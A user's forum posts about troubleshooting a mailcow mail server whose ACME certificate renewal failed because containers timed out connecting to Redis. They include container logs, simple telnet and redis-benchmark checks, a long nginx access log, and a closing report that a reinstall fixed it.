I’ve completly reinstalled mailcow and now all works - couldn’t find out, what the problem was…
ptC7H12

- 31 Jan
- Joined May 21, 2024
- 2 discussions
- 9 posts
- 0 best answers
- Post posted... wait what?
I don’t see Telnet mentioned above, but thank you.
I tried following also with localhost, both with same result:
docker container inspect mailcowdockerized-redis-mailcow-1 | grep -i IPAddress
this gave me the 172.22.1.249
Then
telnet 172.22.1.249 6379
Result is:
Trying 172.22.1.249...
Connected to 172.22.1.249.
Escape character is '^]'.
ping
+PONGThis look good to me! How should I proceed now?
How can I check the Redis connection, please?
esackbauer Can you help me here? How can I check this? I couldn’t find any realy helpful…
I found something like this: time docker exec mailcowdockerized-redis-mailcow-1 redis-benchmark -h 127.0.0.1 -p 6379
This works and gives me results…Yes mentioned requirements are met.
As I wrote, it suddenly stopped. But worked before for about half a year withour problems…
I’ve a 4C/8GB RAM Server VPS.Any more I can check? I’ts just not connecting to Redis…
Someone any Idea?
I installed all with the original documentation. Where can I look? Any settings to check?- Edited
Hello,
I installed Mailcow on a Testserver at Hetzer which I now wanted to use productive. I found that the certificate has been not renewed and isn’t valid now.
So I wanted to see why and found, that acme could not connect to REDIS. Before the setup ran wihtout problems for a about half a year.
I did a Upate to latest version now, but nothing changed - I don’t see any errors in the redis log.
Below are the logs.Dovecot
root@Testmailserver:/opt/mailcow-dockerized# docker logs --tail=200 -f mailcowdockerized-dovecot-mailcow-1
Uptime: 0 Threads: 2 Questions: 1 Slow queries: 0 Opens: 17 Open tables: 10 Queries per second avg: 0.000
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 1 seconds. 10 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 2 seconds. 9 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 4 seconds. 8 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 8 seconds. 7 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 16 seconds. 6 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 32 seconds. 5 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 64 seconds. 4 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 128 seconds. 3 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 256 seconds. 2 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Warning: Problem : timeout. Will retry in 512 seconds. 1 retries left.
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0curl: (6) Could not resolve host: www.spamassassin.heinlein-support.de
Failed to download SA rules. Exiting.
2024-08-28 20:30:59,763 INFO Set uid to user 0 succeeded
2024-08-28 20:30:59,766 INFO supervisord started with pid 1
2024-08-28 20:31:00,770 INFO spawned: 'processes' with pid 603
2024-08-28 20:31:00,773 INFO spawned: 'dovecot' with pid 604
2024-08-28 20:31:00,775 INFO spawned: 'syslog-ng' with pid 605
Aug 28 20:31:00 6e85f366b77b syslog-ng[605]: syslog-ng starting up; version='4.7.1'
Aug 28 20:31:00 6e85f366b77b dovecot: master: Dovecot v2.3.21.1 (d492236fa0) starting up for imap, sieve, lmtp, pop3
2024-08-28 20:31:01,860 INFO success: processes entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2024-08-28 20:31:01,860 INFO success: dovecot entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2024-08-28 20:31:01,860 INFO success: syslog-ng entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
Aug 28 20:31:10 6e85f366b77b syslog-ng[605]: REDIS server error during connection; driver='d_redis_ui_log#0', error='Operation timed out', time_reopen='60'
Aug 28 20:31:10 6e85f366b77b syslog-ng[605]: REDIS server error during connection; driver='d_redis_f2b_channel#0', error='Operation timed out', time_reopen='60'
Aug 28 20:32:10 6e85f366b77b syslog-ng[605]: REDIS server error during connection; driver='d_redis_f2b_channel#0', error='Operation timed out', time_reopen='60'
Aug 28 20:32:10 6e85f366b77b syslog-ng[605]: REDIS server error during connection; driver='d_redis_ui_log#0', error='Operation timed out', time_reopen='60'
Aug 28 20:33:20 6e85f366b77b syslog-ng[605]: REDIS server error during connection; driver='d_redis_f2b_channel#0', error='Operation timed out', time_reopen='60'
Aug 28 20:33:20 6e85f366b77b syslog-ng[605]: REDIS server error during connection; driver='d_redis_ui_log#0', error='Operation timed out', time_reopen='60'acme
root@Testmailserver:/opt/mailcow-dockerized# docker logs --tail=200 -f mailcowdockerized-acme-mailcow-1
Could not connect to Redis at redis:6379: Operation timed out
Waiting for Redis...
Could not connect to Redis at redis:6379: Operation timed out
Waiting for Redis...
Could not connect to Redis at redis:6379: Operation timed out
Waiting for Redis...
Waiting for Redis...
Could not connect to Redis at redis:6379: Operation timed outRedis
root@Testmailserver:/opt/mailcow-dockerized# docker logs --tail=200 -f mailcowdockerized-redis-mailcow-1
1:C 28 Aug 2024 20:12:50.955 # WARNING Memory overcommit must be enabled! Without it, a background save or replication may fail under low memory condition. Being disabled, it can also cause failures without low memory condition, see https://github.com/jemalloc/jemalloc/issues/1328. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
1:C 28 Aug 2024 20:12:50.959 * oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
1:C 28 Aug 2024 20:12:50.959 * Redis version=7.4.0, bits=64, commit=00000000, modified=0, pid=1, just started
1:C 28 Aug 2024 20:12:50.959 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
1:M 28 Aug 2024 20:12:50.960 * monotonic clock: POSIX clock_gettime
1:M 28 Aug 2024 20:12:50.961 * Running mode=standalone, port=6379.
1:M 28 Aug 2024 20:12:50.961 * Server initialized
1:M 28 Aug 2024 20:12:50.961 * Loading RDB produced by version 7.4.0
1:M 28 Aug 2024 20:12:50.961 * RDB age 108 seconds
1:M 28 Aug 2024 20:12:50.961 * RDB memory usage when created 56.32 Mb
1:M 28 Aug 2024 20:12:51.049 * Done loading RDB, keys loaded: 35, keys expired: 0.
1:M 28 Aug 2024 20:12:51.049 * DB loaded from disk: 0.088 seconds
1:M 28 Aug 2024 20:12:51.051 * Ready to accept connections tcp
1:M 28 Aug 2024 20:17:51.101 * 100 changes in 300 seconds. Saving...
1:M 28 Aug 2024 20:17:51.104 * Background saving started by pid 21
21:C 28 Aug 2024 20:17:51.228 * DB saved on disk
21:C 28 Aug 2024 20:17:51.230 * Fork CoW for RDB: current 1 MB, peak 1 MB, average 0 MB
1:M 28 Aug 2024 20:17:51.307 * Background saving terminated with success
1:M 28 Aug 2024 20:29:54.235 * 100 changes in 300 seconds. Saving...
1:M 28 Aug 2024 20:29:54.238 * Background saving started by pid 22
22:C 28 Aug 2024 20:29:54.358 * DB saved on disk
22:C 28 Aug 2024 20:29:54.360 * Fork CoW for RDB: current 1 MB, peak 1 MB, average 0 MB
1:M 28 Aug 2024 20:29:54.441 * Background saving terminated with successPlease help me with this issue
Kann es sein, dass ich einfach zugespamt wurde? Mittlerweile ist die CPU Last runter auf 2% . Kann man sowas direkt verhindern?
nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:17:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:17:26 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:17:46 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:17:46 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:17:58 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:18:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:18:21 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:18:21 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:18:25 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.254.28.50 - - [21/May/2024:23:18:40 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://riepe.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/105.0.5173.0 Safari/537.36" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:19:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:19:14 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:19:15 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:19:17 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:19:17 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 109.62.68.4 - - [21/May/2024:23:19:49 +0200] "GET /api/liverate/public/scripts/api.js HTTP/1.1" 404 178 "https://www.waldsaegmuehle.de/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/25.0 Chrome/121.0.0.0 Mobile Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:20:05 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:20:08 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:20:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:21:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 168.119.64.253 - - [21/May/2024:23:21:21 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 146 "https://www.sternen.ch/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:21:34 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 66.249.92.164 - - [21/May/2024:23:21:42 +0200] "GET /api/liverate/public/scripts/api.js HTTP/1.1" 404 146 "https://www.bayerischerhof-lindau.de/" "AdsBot-Google (+http://www.google.com/adsbot.html)" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:21:46 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:21:46 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:21:48 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:22:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:22:21 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:22:24 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:22:25 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:22:25 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:22:59 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:23:03 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:23:04 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:23:04 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:23:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 87.250.224.215 - - [21/May/2024:23:23:38 +0200] "GET /api/liverate/public/scripts/api.js HTTP/1.1" 404 178 "https://www.essener-hof.com/" "Mozilla/5.0 (compatible; YandexRenderResourcesBot/1.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:23:51 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:23:51 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:23:51 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:24:02 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:24:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:24:28 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:24:28 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:24:33 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:25:06 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:25:06 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:25:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:25:18 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:25:31 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:25:55 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:26:04 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:26:04 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:26:06 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:26:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:26:34 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 66.249.66.164 - - [21/May/2024:23:26:40 +0200] "GET /api/liverate/public/scripts/api.js HTTP/1.1" 404 178 "https://www.bayerischerhof-lindau.de/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/125.0.6422.66 Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:27:03 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:27:03 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:27:03 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:27:03 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:27:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:27:40 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:27:53 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:27:53 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:27:57 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:28:05 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:28:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:28:24 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:28:24 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:28:31 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:28:52 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 2.188.236.135 - - [21/May/2024:23:28:54 +0200] "GET / HTTP/1.1" 200 26486 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:29:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:29:14 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:29:14 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:29:24 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:29:25 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:29:46 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:29:46 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:30:06 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:30:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:30:17 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:30:29 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:30:29 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:30:35 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:31:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:31:14 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:31:21 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:31:27 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:31:27 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:32:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:32:11 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:32:24 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:32:24 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:32:27 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:32:54 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:32:54 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:32:55 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:32:56 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:33:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 87.237.172.74 - - [21/May/2024:23:33:42 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.central-wolter.ch/" "Mozilla/5.0 (Linux; Android 10; CLT-L29 Build/HUAWEICLT-L29; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/124.0.6367.179 Mobile Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:33:45 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 